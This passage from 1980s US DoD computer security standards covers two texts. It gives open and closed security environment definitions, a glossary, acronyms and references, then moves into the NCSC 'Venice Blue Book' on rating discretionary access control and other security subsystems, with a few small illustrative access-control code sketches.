   a. Application developers (including maintainers) do not have sufficient
      clearance (or authorization) to provide an acceptable presumption that
      they have not introduced malicious logic. Sufficient clearance is
      defined as follows: where the maximum classification of data to be
      processed is Confidential or below, developers are cleared and
      authorized to the same level as the most sensitive data; where the
      maximum classification of data to be processed is Secret or above,
      developers have at least a Secret clearance.

   b. Configuration control does not provide sufficient assurance that
      applications are protected against the introduction of malicious logic
      prior to or during the operation of system applications.

Configuration control, by the broad definition above, encompasses all factors
associated with the management of changes to a system.  For example, it
includes the factor that the application's user interface might present a
sufficiently extensive set of user capabilities such that the user cannot be
prevented from entering malicious logic through the interface itself.

In an open security environment, the malicious application logic that is
assumed to be present can attack the TCB in two ways.  First, it can attempt to
thwart TCB controls and thereby "penetrate" the system.  Second, it can
exploit covert channels that might exist in the TCB.  This distinction is
important in understanding the threat and how it is addressed by the features
and assurances in the Criteria.

C.2 Closed Security Environment

A closed security environment includes those systems in which both of the
following conditions hold true:

     a. Application developers (including maintainers) have sufficient
        clearances and authorizations to provide an acceptable presumption
        that they have not introduced malicious logic.

     b. Configuration control provides sufficient assurance that applications
        are protected against the introduction of malicious logic prior to and
        during the operation of system applications.

Clearances are required for assurance against malicious application logic
because there are few other tools for assessing the security-relevant behavior
of application hardware and software.  On the other hand, several assurance
requirements from the Criteria help to provide confidence that the TCB does not
contain malicious logic.  These assurance requirements include extensive
functional testing, penetration testing, and correspondence mapping between a
security model and the design.  Application logic typically does not have such
stringent assurance requirements.  Indeed, typically it is not practical to
build all application software to the same standards of quality required for
security software.

The configuration control condition implicitly includes the requirement that
users be provided a sufficiently limited set of capabilities to pose an
acceptably low risk of entering malicious logic.  Examples of systems with such
restricted interfaces might include those that offer no data sharing services
and permit the user only to execute predefined processes that run on his
behalf, such as message handlers, transaction processors, and security
"filters" or "guards."
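The open/closed distinction above reduces to a simple predicate: a system is in
a closed environment only when both conditions of Section C.2 hold, and in an
open environment when either fails. A minimal sketch (the flag names are ours,
and the judgment of "sufficient" is outside the code):

```python
def is_closed_environment(developers_sufficiently_cleared: bool,
                          config_control_sufficient: bool) -> bool:
    # Closed (Section C.2): BOTH conditions must hold.
    return developers_sufficiently_cleared and config_control_sufficient

def is_open_environment(developers_sufficiently_cleared: bool,
                        config_control_sufficient: bool) -> bool:
    # Open (Section C.1): EITHER condition fails, i.e. not closed.
    return not is_closed_environment(developers_sufficiently_cleared,
                                     config_control_sufficient)
```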

                    GLOSSARY
For additional definitions, refer to the Glossary in the DoD Trusted Computer
System Evaluation Criteria.(4)

Application
   Those portions of a system, including portions of the operating system, that
   are not responsible for enforcing the security policy.

Category
   A grouping of classified or unclassified but sensitive information, to which
   an additional restrictive label is applied (e.g., proprietary, compartmented
   information).

Classification
   A determination that information requires, in the interest of national
   security, a specific degree of protection against unauthorized disclosure
   together with a designation signifying that such a determination has been
   made. (Adapted from DoD Regulation 5200.1-R.)(3) Data classification is
   used along with categories in the calculation of risk index.

Closed Security Environment
   An environment that includes those systems in which both of the following
   conditions hold true:

   a. Application developers (including maintainers) have sufficient
      clearances and authorizations to provide an acceptable presumption
      that they have not introduced malicious logic. Sufficient clearance is
      defined as follows: where the maximum classification of data to be
      processed is Confidential or below, developers are cleared and
      authorized to the same level as the most sensitive data; where the
      maximum classification of data to be processed is Secret or above,
      developers have at least a Secret clearance.

   b. Configuration control provides sufficient assurance that applications
      are protected against the introduction of malicious logic prior to and
      during operation of system applications.

Compartmented Information
   Any information for which the responsible Office of Primary Interest (OPI)
   requires an individual needing access to that information to possess a
   special authorization.

Configuration Control
   Management of changes made to a system's hardware, software, firmware,
   and documentation throughout the developmental and operational life of
   the system.

Covert Channel
   A communications channel that allows a process to transfer information in
   a manner that violates the system's security policy.(4)

Discretionary Access Control
   A means of restricting access to objects based on the identity of subjects
   and/or groups to which they belong. The controls are discretionary in the
   sense that a subject with a certain access permission is capable of passing
   that permission (perhaps indirectly) on to any other subject.(4)

Environment
   The aggregate of external circumstances, conditions, and objects that affect
   the development, operation, and maintenance of a system. (See Open
   Security Environment and Closed Security Environment.)

Label
   A piece of information that represents the security level of an object and
   that describes the sensitivity of the information in the object.

Malicious Logic
   Hardware, software, or firmware that is intentionally included in a system
   for the purpose of causing loss or harm.

Mandatory Access Control
   A means of restricting access to objects based on the sensitivity (as
   represented by a label) of the information contained in the objects and the
   formal authorization (i.e., clearance) of subjects to access information of
   such sensitivity.(4)

Need-To-Know
   A determination made by the possessor of sensitive information that a
   prospective recipient, in the interest of national security, has a
   requirement for access to, knowledge of, or possession of the sensitive
   information in order to perform official tasks or services.  (Adapted from
   DoD Regulation 5220.22-R.)(20)

Open Security Environment
   An environment that includes those systems in which one of the following
   conditions holds true:

   a. Application developers (including maintainers) do not have sufficient
      clearance or authorization to provide an acceptable presumption that
      they have not introduced malicious logic. (See the definition of Closed
      Security Environment for an explanation of sufficient clearance.)
   b. Configuration control does not provide sufficient assurance that
      applications are protected against the introduction of malicious logic
      prior to and during the operation of system applications.

Risk Index
   The disparity between the minimum clearance or authorization of system
   users and the maximum classification of data processed by the system.
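   As a rough illustration, this disparity can be sketched numerically. The
   ratings below are simplified stand-ins for the report's actual rating
   tables (given in Section 2), which also adjust for categories and
   distinguish TS(BI) from TS(SBI); the names are ours.

```python
# Hypothetical numeric ratings for illustration only; the authoritative
# ratings and adjustment rules are in Section 2 of the report.
RATING = {"U": 0, "N": 1, "C": 2, "S": 3, "TS": 5}

def risk_index(min_user_clearance: str, max_data_sensitivity: str) -> int:
    """Risk index as the non-negative clearance/sensitivity disparity."""
    return max(0, RATING[max_data_sensitivity] - RATING[min_user_clearance])
```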

Sensitive Information
   Information that, as determined by a competent authority, must be
   protected because its unauthorized disclosure, alteration, loss, or
     destruction will at least cause perceivable damage to someone or
     something.(4)

System
     An assembly of computer hardware, software, and firmware configured for
     the purpose of classifying, sorting, calculating, computing, summarizing,
     transmitting and receiving, storing and retrieving data with a minimum of
     human intervention.

System Users
     Users with direct connections to the system and also those individuals
     without direct connections who receive output or generate input that is
     not reliably reviewed for classification by a responsible individual.  The
     clearance of system users is used in the calculation of the risk index.

                     ACRONYMS
A1       An evaluation class requiring a verified design
ADP      Automated Data Processing
ADPS     Automated Data Processing System
AFSC     Air Force Systems Command

B1       An evaluation class requiring labeled security protection
B2       An evaluation class requiring structured protection
B3       An evaluation class requiring security domains
BI       Background Investigation

C        Confidential
C1       An evaluation class requiring discretionary security protection
C2       An evaluation class requiring controlled access protection
CI       Compartmented Information
CSC      Computer Security Center
COMINT   Communications Intelligence

DCI      Director of Central Intelligence
DCID     Director of Central Intelligence Directive
DIAM     Defense Intelligence Agency Manual
DIS      Defense Investigative Service
DoD      Department of Defense
DoDCSC   Department of Defense Computer Security Center

ESD      Electronic Systems Division

FOI      Freedom of Information
FOUO     For Official Use Only
FTLS     Formal Top-Level Specification

IEEE     Institute of Electrical and Electronics Engineers

L        A personnel security clearance granted by the Department of Energy
         and the Nuclear Regulatory Commission

MC       Multiple Categories

N        Not Cleared but Authorized Access to Sensitive Unclassified
         Information or Not Classified but Sensitive
NAC      National Agency Check
NATO     North Atlantic Treaty Organization
NOFORN   Not Releasable to Foreign Nationals
NSA      National Security Agency
NSA/CSS  National Security Agency/Central Security Service
NTIS     National Technical Information Service

OMB      Office of Management and Budget
OPI      Office of Primary Interest
OPNAV    Office of the Chief of Naval Operations
OSD      Office of the Secretary of Defense

PROPIN   Caution--Proprietary Information Involved

Q         A personnel security clearance granted by the Department of Energy
          and the Nuclear Regulatory Commission

S         Secret
SBI       Special Background Investigation
SCI       Sensitive Compartmented Information
SIOP      Single Integrated Operational Plan
SIOP-ESI  Single Integrated Operational Plan--Extremely Sensitive Information
SM        Staff Memorandum
STD       Standard

TCB       Trusted Computing Base
TS        Top Secret

U         Uncleared or Unclassified
U.S.      United States

1C        One Category

                   REFERENCES
1. DoD Computer Security Center, Computer Security Requirements --
   Guidance for Applying the Department of Defense Trusted Computer
   System Evaluation Criteria in Specific Environments, CSC-STD-003-85, 25
   June 1985.

2. DoD Directive 5215.1, "Computer Security Evaluation Center," 25 October
   1982.

3. DoD Regulation 5200.1-R, Information Security Program Regulation,
   August 1982.

4. DoD Computer Security Center, DoD Trusted Computer System Evaluation
   Criteria, CSC-STD-001-83, 15 August 1983.

5.  Army Regulation 380-380, Automated Systems Security, 15 June 1979.

6. Office of the Chief of Naval Operations (OPNAV) Instruction 5239.1A,
   "Department of the Navy Automatic Data Processing Security Program," 3
   August 1982.

7. Air Force Regulation 205-16, Automated Data Processing System (ADPS)
   Security Policy, Procedures, and Responsibilities, 1 August 1984.

8. Marine Corps Order P5510.14, Marine Corps Automatic Data Processing
   (ADP) Security Manual, 4 November 1982.

9. DoD Directive 5220.22, "DoD Industrial Security Program," 8 December
   1980.

10. DoD Directive 5200.28, "Security Requirements for Automatic Data
   Processing Systems," 29 April 1978.

11. DoD Manual 5200.28-M, ADP Security Manual - Techniques and
   Procedures for Implementing, Deactivating, Testing, and Evaluating
   Secure Resource-Sharing ADP Systems, 25 June 1979.

12. Defense Intelligence Agency Manual (DIAM) 50-4, "Security of
   Compartmented Computer Operations (U)," 24 June 1980,
   CONFIDENTIAL.

13. National Security Agency/Central Security Service (NSA/CSS) Directive
   10-27, "Security Requirements for Automatic Data Processing (ADP)
   Systems," 29 March 1984.

14.  Director of Central Intelligence Directive (DCID), "Security Controls on
   the Dissemination of Intelligence Information (U)," 7 January 1984,
   CONFIDENTIAL.

15.  DoD Directive 5400.7, "DoD Freedom of Information Act Program," 24
     April 1980.

16.  Office of the Secretary of Defense (OSD) Memorandum, "Control of
     Unclassified Technology with Military Application," 18 October 1983.

17.  Anderson, James P., "An Approach to Identification of Minimum TCB
     Requirements for Various Threat/Risk Environments," Proceedings of the
     1983 IEEE Symposium on Security and Privacy, 24-27 April 1983.

18.  Schell, Roger R., "Evaluating Security Properties of Systems," Proceedings
     of the IEEE Symposium on Security and Privacy, 24-27 April 1983.

19.  Defense Investigative Service (DIS) Manual 20-1, Manual for Personnel
     Security Investigations, 30 January 1981.

20.  DoD Regulation 5220.22-R, Industrial Security Regulation, January 1983.

21.  National Disclosure Policy - I, 9 September 1981.

22.  DoD Directive 5230.11, "Disclosure of Classified Military Information to
     Foreign Governments and International Organizations," 31 December
     1976.

23.  Title 35, United States Code, Section 181-188, "Patent Secrecy."

24.  Title 5, United States Code, Section 551, "Administrative Procedures Act."

25.  DoD Directive 5400.11, "Department of Defense Privacy Program," 9 June
     1982.

26.  DoD Directive 5100.36, "Defense Scientific and Technical Information
     Program," 2 October 1981.

27.  DoD Directive 5010.12, "Management of Technical Data," 5 December
     1968.

28.  Title 18, United States Code, Section 1905, "Disclosure of Confidential
     Information Generally."

29.  DoD Directive 5200.1, "DoD Information Security Program," 7 June 1982.

30.  Office of Management and Budget (OMB) Circular No. A-71, Transmittal
     Memorandum No. 1, "Security of Federal Automated Information Systems,"
     27 July 1978.

31.  Joint Chiefs of Staff (JCS) Staff Memorandum (SM) 313-83, Safeguarding
     the Single Integrated Operational Plan (SIOP) (U), 10 May 1983, SECRET.


32.  "Security Policy on Intelligence Information in Automated Systems and
     Networks (U)," Promulgated by the DCI, 4 January 1983,  CONFIDENTIAL.

33.  Director of Central Intelligence Computer Security Manual (U), Prepared
     for the DCI by the Security Committee, 4 January 1983, CONFIDENTIAL.

34.  DoD Directive 5210.2, "Access to and Dissemination of Restricted Data," 12
     January 1978.

35.  DoD Instruction C-5210.21, "Implementation of NATO Security Procedure
     (U)," 17 December 1973, CONFIDENTIAL.

The Venice Blue Book: Computer Security Subsystems (September 1988)

NCSC-TG-009 - Computer Security Subsystems
Library No. S230,512 
Version 1 
FOREWORD
This publication is issued by the National Computer Security Center (NCSC) as part of its program to promulgate technical computer security guidelines. This interpretation extends the Department of Defense Trusted Computer System Evaluation Criteria (DOD 5200.28-STD) to computer security subsystems. 
This document will be used for a period of at least one year after date of signature. During this period the NCSC will gain experience using the Computer Security Subsystem Interpretation in several subsystem evaluations. After this trial period, necessary changes to the document will be made and a revised version issued. 
Anyone wishing more information, or wishing to provide comments on the usefulness or correctness of the Computer Security Subsystem Interpretation, may contact: Chief, Technical Guidelines Division, National Computer Security Center, Fort George G. Meade, MD 20755-6000, ATTN: C11. 
PATRICK R. GALLAGHER, JR. 16 September 1988 
Director, National Computer Security Center 
ACKNOWLEDGEMENT
Acknowledgment is extended to the members of the working group who produced this Interpretation. Members were: Michael W. Hale, National Computer Security Center (Chair); James P. Anderson; Terry Mayfield, Institute For Defense Analyses; Alfred W. Arsenault, NCSC; William Geer, NCSC; John C. Inglis, NCSC; Dennis Steinauer, National Bureau of Standards; Mario Tinto, NCSC; Grant Wagner, NCSC; and Chris Wilcox, NCSC. 
Acknowledgement is further extended to those individuals who conducted thorough reviews and provided constructive comments on this document. Reviewers included: Steve Lipner, Earl Boebert, Virgil Gligor, Debbie Downs, Len Brown, Doug Hardie, Steve Covington, Jill Sole and Bob Morris. 
1. INTRODUCTION
This document provides interpretations of the Department of Defense Trusted Computer System Evaluation Criteria (DoD 5200.28-STD or TCSEC) for computer security subsystems. A computer security subsystem (subsystem) is defined, herein, as hardware, firmware and/or software which can be added to a computer system to enhance the security of the overall system. A subsystem's primary utility is to increase the security of a computer system. The computer system that the subsystem is to protect is referred to as the protected system in this Interpretation. 
When incorporated into a system environment, evaluated computer security subsystems may be very effective in reducing or eliminating certain types of vulnerabilities whenever entire evaluated systems are unavailable or impractical. 
1.1 PURPOSE
This Interpretation has been prepared for the following purposes: 
1. to establish a standard for manufacturers as to what security features and assurance levels to build into their new and planned computer security subsystem products to provide widely available products that satisfy trust requirements for sensitive applications; 
2. to provide a metric to evaluate the degree of trust that can be placed in a subsystem for protecting classified and sensitive information; 
3. to lend consistency to evaluations of these products by explicitly stating the implications that are in the TCSEC; and 
4. to provide the security requirements for subsystems in acquisition specifications. 
1.2 BACKGROUND
The Department of Defense Trusted Computer System Evaluation Criteria (DoD 5200.28-STD or TCSEC) was developed to establish uniform DoD policy and security requirements for "trusted, commercially available, automatic data processing (ADP) systems." The evaluation criteria defined in the TCSEC provide a standard for manufacturers as to what security features to build into their commercial products to satisfy trust requirements for sensitive applications, and serve as a metric with which to evaluate the degree of trust that can be placed in a computer system for the secure processing of classified or other sensitive information. 
The TCSEC specifies a variety of features that a computer system must provide to constitute a complete security system. The security requirements specified in the TCSEC depend on and complement one another to provide the basis for effective implementation of a security policy in a trusted computer system. The effectiveness of any one security feature present within a system is, therefore, dependent to some degree on the presence and effectiveness of other security features found within the same system. Because it was intended to be used only for systems which incorporated all the security features of a particular evaluation class, the TCSEC does not, in all cases, completely specify these interdependencies among security features. 
In addition to the class of trusted system products, there exists a recognized need for a class of computer security products which may not individually meet all of the security features and assurances of the TCSEC. Instead, these products may implement some subset of the features enumerated in the TCSEC and can potentially improve the security posture in existing systems. These products are collectively known as computer security subsystems. 
Evaluation of computer security subsystems against a subset of the requirements given in the TCSEC has proven an extremely difficult task because of the implied dependencies among the various features discussed in the TCSEC. As a consequence, interpretations of these interdependencies and the relative merits of specific subsystem implementations have been highly subjective and given to considerable variation. 
This document provides interpretations of the TCSEC for computer security subsystems in an effort to lend consistency to evaluations of these products by explicitly stating the implications in the TCSEC. 
Evaluations can be divided into two types: (1) a product evaluation can be performed on a subsystem from a perspective that excludes the application environment, or (2) a certification evaluation can be done to assess whether appropriate security measures have been taken to permit an entire system to be used operationally in a specific environment. The product evaluation type is done by the National Computer Security Center (NCSC) through the Trusted Product Evaluation Process using this interpretation for subsystems. The certification type of evaluation is done in support of a formal accreditation for a system to operate in a specific environment using the TCSEC. 
1.3 SCOPE
This document interprets the security feature, assurance and documentation requirements of the TCSEC for subsystem evaluations. In this interpretation, the functional requirements of the TCSEC are divided into four general categories: 
1. Discretionary Access Control (DAC) 
2. Object Reuse (OR). 
3. Identification and Authentication (I&A) 
4. Audit (AUD) 
These categories form the basis for classifying products to be evaluated as computer security subsystems. 
The document, in addition to this introductory section, is organized into three major sections and a glossary. Section 2 contains the feature requirements for each of the above four categories on which subsystem evaluations are based. The requirements in this section are listed in increments, with only new or changed requirements being added for each subsequent class of the same feature. All requirements that are quoted from the TCSEC are in bold print for easy identification and are clarified, in the context of subsystems, by interpretation paragraphs. 
Section 3 contains the assurance requirements for all subsystems. The assurances that are relevant to each category are listed here in the same format as the requirements in Section 2. Section 4 contains the requirements and interpretations for subsystem documentation, again, in the same format as Section 2. 
The TCSEC-related feature and assurance requirements described herein are intended for the evaluation of computer security subsystems designed to protect sensitive information. This Interpretation, like the TCSEC, assumes that physical, administrative, and procedural protection measures adequate to protect the information being handled are already in place. 
This Interpretation can be used to support a certification evaluation. In fact, it would be helpful whenever subsystems are a part of the overall system being certified. 
1.4 EVALUATION OF SUBSYSTEMS
1.4.1 Basis for Evaluation
Subsystems are evaluated for the specific security-relevant functions they perform. This Interpretation interprets the relevant TCSEC requirements for each function evaluated, so the function(s) for which a subsystem is evaluated will be identified within its rating. Each function has its own set of ratings, as identified in Table 1.1. Subsystems that are evaluated for more than one function will receive a separate rating for each function evaluated. 
TABLE 1.1. Possible Subsystem Ratings 
SUBSYSTEM FUNCTION                   POSSIBLE RATINGS                      

Discretionary Access Control         DAC/D, DAC/D1, DAC/D2, DAC/D3         

Object Reuse                         OR/D, OR/D2                           

Identification & Authentication      I&A/D, I&A/D1, I&A/D2                 

Audit                                AUD/D, AUD/D2, AUD/D3                 

Although the requirements for subsystems are derived from the TCSEC, the ratings for subsystems will not directly reflect the TCSEC class they are derived from. Since subsystems, by their very nature, do not meet all of the requirements for a class C1 or higher computer system, it is most appropriate to associate subsystem ratings with the D division of the TCSEC. This Interpretation defines the D1, D2 and D3 classes within the D division for subsystems. The D1 class is assigned to subsystems that meet the interpretations for requirements drawn from the C1 TCSEC class. Likewise, the D2 class consists of requirements and interpretations that are drawn from the C2 TCSEC class. The D3 subsystem class is reserved for DAC subsystems and audit subsystems that meet the B3 functionality requirements for those functions. 
In addition to meeting the functionality requirements and interpretations, subsystems must also meet the assurance and documentation requirements in sections 3 and 4 of this document. The D1 and D2 classes have requirements and interpretations for assurances and documentation as well as functionality. 
The D3 class contains additional requirements and interpretations only for functionality, not for assurances or documentation. So, subsystems with this rating will adhere to the D2 assurance and documentation requirements and interpretations. 
Like the classes within the TCSEC, the D1, D2 and D3 classes are ordered hierarchically. Subsystems being evaluated for the D1 class must meet the requirements and interpretations for the D1 class. Subsystems being evaluated for the D2 class must meet the requirements and interpretations for the D1 class plus the additional requirements and interpretations for the D2 class. Subsystems being evaluated for the D3 class must meet the additional requirements and interpretations associated with the functionality at D3. 
Although the subsystem requirements and interpretations are derived directly from the TCSEC, subsystems are not considered to be complete computer security solutions. There is no general algorithm to derive a system rating from an arbitrary collection of computer security subsystems. Any collection of individually evaluated subsystems must be evaluated as a whole to determine the rating of the resulting system. The ratings of the individual subsystems in a complete system are not a factor in the rating of that system. 
1.4.2 Integration Requirements
Because all of the TCSEC requirements for a given rating class were intended to be implemented in a complete computer security system, many of the security features are dependent upon each other for support within the system. This poses a certain degree of difficulty with extracting only the relevant requirements from the TCSEC for a given feature. Further, this poses a fundamental problem for subsystems because there is an explicit dependency between security features that restricts the "independent" incorporation of subsystems into the system's environment. The problem has been handled in this Interpretation by discussing the integration requirements for each type of subsystem. The requirements for integration are discussed for each type of subsystem in a sub-section entitled, "Role Within Complete Security System." Furthermore, explicit requirements for integration are stated in the interpretations at appropriate points. The developer must show, and the evaluation shall validate, that the subsystem can be integrated into a system to fulfill its designated role. 
Almost all computer security subsystems will rely on other security-relevant functions in the environment where they are implemented. Audit subsystems, for example, depend on an identification and authentication function to provide the unique user identities that are necessary for individual accountability. Also, it is important to realize that some of these functions may be dependent on each other in a cyclic fashion (e.g., I&A depends on DAC and DAC depends on I&A). In these cases, the cyclic dependencies should be removed either by complete integration of the functions or by modularizing the functions in a way that allows linear dependencies. This latter method is termed "sandwiching", and it requires splitting one function and surrounding the other dependent function with the two functions resulting from the split. For example, in the case of DAC and I&A cyclic dependencies, one might split I&A into two parts so that there is a system I&A, a DAC subsystem, and a DAC module containing its own I&A functionality. 
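The restructuring described above can be illustrated with a small sketch (illustrative Python, not part of this Interpretation; the function names and dependency data are hypothetical): a cyclic dependency graph between I&A and DAC admits no linear ordering, while the "sandwiched" split does.

```python
# Illustrative sketch (not from this Interpretation): a set of security
# functions has only linear dependencies exactly when its dependency graph
# is acyclic, i.e. a topological ordering exists.

def linear_order(deps):
    """Return a dependency-respecting order of functions, or None on a cycle."""
    order, visiting, done = [], set(), set()

    def visit(node):
        if node in done:
            return True
        if node in visiting:            # back edge: cyclic dependency
            return False
        visiting.add(node)
        for d in deps.get(node, ()):
            if not visit(d):
                return False
        visiting.discard(node)
        done.add(node)
        order.append(node)              # node comes after its dependencies
        return True

    return order if all(visit(n) for n in list(deps)) else None

# Cyclic case from the text: I&A depends on DAC and DAC depends on I&A.
assert linear_order({"I&A": ["DAC"], "DAC": ["I&A"]}) is None

# "Sandwiching": split I&A into a system-level I&A and a private I&A module
# inside the DAC subsystem, leaving only linear dependencies.
sandwiched = {
    "system I&A": ["DAC"],
    "DAC": ["DAC-internal I&A"],
    "DAC-internal I&A": [],
}
assert linear_order(sandwiched) is not None
```

The point of the sketch is only structural: after the split, every function depends solely on functions "below" it, so the subsystems can be integrated in a well-defined order.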
With the exception of object reuse, all functions implemented by subsystems will be dependent on other functions as shown in Table 1.2. The functions upon which any subsystem is dependent will be referred to as that subsystem's required supporting functions. These required supporting functions must be present in the subsystem's environment for the effective integration of the subsystem. 
TABLE 1.2. Required Supporting Functions 
SUBSYSTEM FUNCTION                   REQUIRED SUPPORTING FUNCTIONS         

Discretionary Access Control         I&A, Audit¹                           

Object Reuse                         None                                  

Identification & Authentication      Audit¹, DAC²                          

Audit                                I&A, DAC²                             

Subsystems that are not self-sufficient in providing required supporting functions must, at a minimum, provide an interface to their required 
supporting functions. The evaluation team will perform tests to show whether the interface to the required supporting functions is reliable and works properly. The robustness of the required supporting functions on the other side of the interface will not be tested, as the scope of the subsystem evaluation is bounded by the interface. 
A more integrated solution is for subsystems to be self-sufficient in providing all of their required supporting functions. Such subsystems will be evaluated and assigned a separate rating for each function they provide. Unlike the previous solution, where only an interface is provided, each required supporting function is performed by the subsystem and must be a part of the subsystem evaluation. 
¹ The audit supporting functions are required at D2. 
² Audit and/or authentication data must be protected through domain isolation or DAC. 
1.4.3 WARNING
An overall system rating, such as that provided by the TCSEC, cannot be inferred from the application of one or more separately-rated subsystems. Mechanisms, interfaces, and the extent of required supporting functions for each subsystem may differ substantially and may introduce significant vulnerabilities that are not present in systems where security features are designed with full knowledge of interfaces and host system support. Therefore, incorporation of an evaluated subsystem into any system environment does not automatically confer any rating to the resulting system. 
2. FEATURE REQUIREMENTS
2.1 DISCRETIONARY ACCESS CONTROL (DAC) SUBSYSTEMS
2.1.1 Global Description of Subsystem Features
2.1.1.1 Purpose
This subsystem provides user-specified, controlled sharing of resources. 
This control is established from security policies which define, given identified subjects and objects, the set of rules that are used by the system to determine whether a given subject is authorized to gain access to a specific object. 
DAC features include the means for restricting access to objects; the means for instantiating authorizations for objects; and the mechanisms for distribution, review, and revocation of access privileges, especially during object creation and deletion. 
2.1.1.2 Role Within Complete Security System
The requirement is to give individual users the ability to restrict access to objects created or controlled by them. Thus, given identified subjects and objects, DAC includes the set of rules (group-oriented and/or individually-oriented) used by the subsystem to ensure that only specified users or groups of users may obtain access to data (e.g., based on a need-to-know). 
A DAC subsystem controls access to resources. As such, it shall be integrable with the operating system of the protected system and shall mediate all accesses to the protected resources. To fully protect itself and the resources it controls, the DAC subsystem must be interfaced to the protected system in such a way that it is tamperproof and always invoked. 
DAC subsystems use the identifiers of both subjects and DAC-controlled objects as a basis for access control decisions. Thus, they must be supplied with the identifiers in a reliable manner. The DAC subsystem may supply subject identification for itself or it may rely on an I&A mechanism in the protected system or in another subsystem. It is also essential that DAC subsystems be implemented in an environment where the objects it protects are well defined and uniquely identified. 
At the DAC/D2 class, the DAC subsystem must interface with an auditing mechanism. This auditing mechanism can be included within the DAC subsystem, or it may reside elsewhere in the subsystem's environment. 
2.1.2 Evaluation of DAC Subsystems
Subsystems which are designed to implement discretionary access controls to assist a host in controlling the sharing of a collection of objects must comply with all of the TCSEC requirements as outlined below for features, assurances and documentation. Compliance with these requirements will assure that the subsystem can enforce a specifically defined group-oriented and/or individually-oriented discretionary access control policy. 
As a part of the evaluation, the subsystem vendor shall set up the subsystem in a typical functional configuration for security testing. This will show that the subsystem interfaces correctly with the protected system to meet all of the feature requirements in this section and all of the assurance and documentation requirements in Sections 3 and 4. It will also show that the subsystem can be integrated into a larger system environment. 
The interpretations for applying the feature requirements to DAC subsystems are explained in the subsequent interpretations sections. The application of the assurance requirements and documentation requirements is explained in Sections 3 and 4, respectively. 
2.1.3 Feature Requirements For DAC Subsystems
2.1.3.1 DAC/D1
TCSEC Quote: 
"C1: New: The TCB shall define and control access between named users and named objects (e.g., files and programs) in the ADP system. The enforcement mechanism (e.g., self/group/public controls, access control lists) shall allow users to specify and control sharing of those objects by named individuals or defined groups or both." 
Interpretation: 
In the TCSEC quote, "TCB" is interpreted to mean "DAC subsystem". 
2.1.3.1.1 Identified users and objects
DAC subsystems must use some mechanism to determine whether users are authorized for each access attempted. At DAC/D1, this mechanism must control access by groups of users. The mechanisms that can meet this requirement include, but are not limited to: access control lists, capabilities, descriptors, user profiles, and protection bits. The DAC mechanism uses the identification of subjects and objects to perform access control decisions. This implies that the DAC subsystem must interface with or provide some I&A mechanism. The evaluation shall show that user identities are available to DAC. 
2.1.3.1.2 User-specified object sharing
The DAC subsystem must provide the capability for users to specify how other users or groups may access the objects they control. This requires that the user have a means to specify the set of authorizations (e.g., access control list) of all users or groups permitted to access an object and/or the set of all objects accessible to a user or group (e.g., capabilities). 
2.1.3.1.3 Mediation
The checking of the specified authorizations of a user prior to granting access to an object is the essential function of DAC which must be provided. Mediation either allows or disallows the access. 
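The D1-level mediation described in 2.1.3.1.1 through 2.1.3.1.3 can be sketched as follows (hypothetical Python, not prescribed by this Interpretation; all names and data structures are illustrative):

```python
# Hypothetical sketch of DAC/D1 mediation: every access attempt is checked
# against the authorizations specified for named users or defined groups
# before the access is allowed. Structures are illustrative only.

groups = {"analysts": {"alice", "bob"}}

# Per-object authorizations: (grantee, kind, mode)
acl = {
    "report.txt": [("alice", "user", "write"),
                   ("analysts", "group", "read")],
}

def mediate(user, obj, mode):
    """Allow the access only if a matching user or group entry exists."""
    for grantee, kind, granted_mode in acl.get(obj, []):
        if granted_mode != mode:
            continue
        if kind == "user" and grantee == user:
            return True
        if kind == "group" and user in groups.get(grantee, set()):
            return True
    return False

assert mediate("alice", "report.txt", "write")     # named-user entry
assert mediate("bob", "report.txt", "read")        # via defined group
assert not mediate("carol", "report.txt", "read")  # no entry: disallowed
```

Note that the check runs on every access attempt; in a real subsystem the mediation point must also be tamperproof and always invoked, as required in 2.1.1.2.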
2.1.3.2 DAC/D2
TCSEC Quote: 
"C2: Change: The enforcement mechanism (e.g., self/group/public controls, access control lists) shall allow users to specify and control sharing of those objects by named individuals, or defined groups of individuals, or by both, and shall provide controls to limit propagation of access rights." 
"C2: Add: The discretionary access control mechanism shall, either by explicit user action or by default, provide that objects are protected from unauthorized access. These access controls shall be capable of including or excluding access to the granularity of a single user. Access permission to an object by users not already possessing access permission shall only be assigned by authorized users." 
Interpretation: 
The following interpretations, in addition to the interpretations for the DAC/D1 Class, shall be satisfied at the DAC/D2 Class. 
2.1.3.2.1 DAC/D2
The DAC/D2 class requires individual access controls; therefore, the granularity of user identification must enable the capability to discern an individual user. That is, access control based upon group identity alone is insufficient. To comply with the requirement, the DAC subsystem must either provide unique user identities through its own I&A mechanism or interface with an I&A mechanism that provides unique user identities. The DAC subsystem must be able to interface to an auditing mechanism that records data about access mediation events. The evaluation shall show that audit data is created and is available to the auditing mechanism. 
2.1.3.2.2 Authorized user-specified object sharing
The ability to propagate access rights to objects must be limited to authorized users. This additional feature is incorporated to limit access rights propagation. This distribution of privileges encompasses granting, reviewing, and revoking of access. The ability to grant the right to grant propagation of access will itself be limited to authorized users. 
2.1.3.2.3 Default protection
The DAC mechanism must deny all users access to objects when no explicit action has been taken by the authorized user to allow access. 
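The DAC/D2 additions, individual granularity, propagation limited to authorized users, and default protection, can be sketched together (hypothetical Python; the owner-based authorization rule and all names are illustrative assumptions, not requirements of this Interpretation):

```python
# Hypothetical sketch of DAC/D2 behavior: objects are protected by default
# (no entry means no access), access is controlled per individual user, and
# only an authorized user (here, the object's owner) may propagate rights.

acls = {}     # object -> {user: set(modes)}
owners = {}   # object -> user authorized to grant access (assumed policy)

def create(owner, obj):
    owners[obj] = owner
    acls[obj] = {}                  # default protection: all users denied

def grant(granter, obj, user, mode):
    if granter != owners[obj]:      # propagation limited to authorized users
        raise PermissionError("not authorized to grant access")
    acls[obj].setdefault(user, set()).add(mode)

def mediate(user, obj, mode):
    return mode in acls.get(obj, {}).get(user, set())

create("alice", "design.doc")
assert not mediate("bob", "design.doc", "read")   # protected by default

grant("alice", "design.doc", "bob", "read")       # explicit owner action
assert mediate("bob", "design.doc", "read")

try:
    grant("bob", "design.doc", "carol", "read")   # bob may not propagate
except PermissionError:
    pass
```

The design point is that denial requires no action by anyone: access exists only where an authorized user has explicitly created it.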
2.1.3.3 DAC/D3
TCSEC Quote: 
"B3: Change: The enforcement mechanism (e.g., access control lists) shall allow users to specify and control sharing of those objects, and shall provide controls to limit propagation of access rights. These access controls shall be capable of specifying, for each named object, a list of named individuals and a list of groups of named individuals with their respective modes of access to that object." 
"Add: Furthermore, for each such named object, it shall be possible to specify a list of named individuals and a list of groups of named individuals for which no access to the object is to be given." 
Interpretation: 
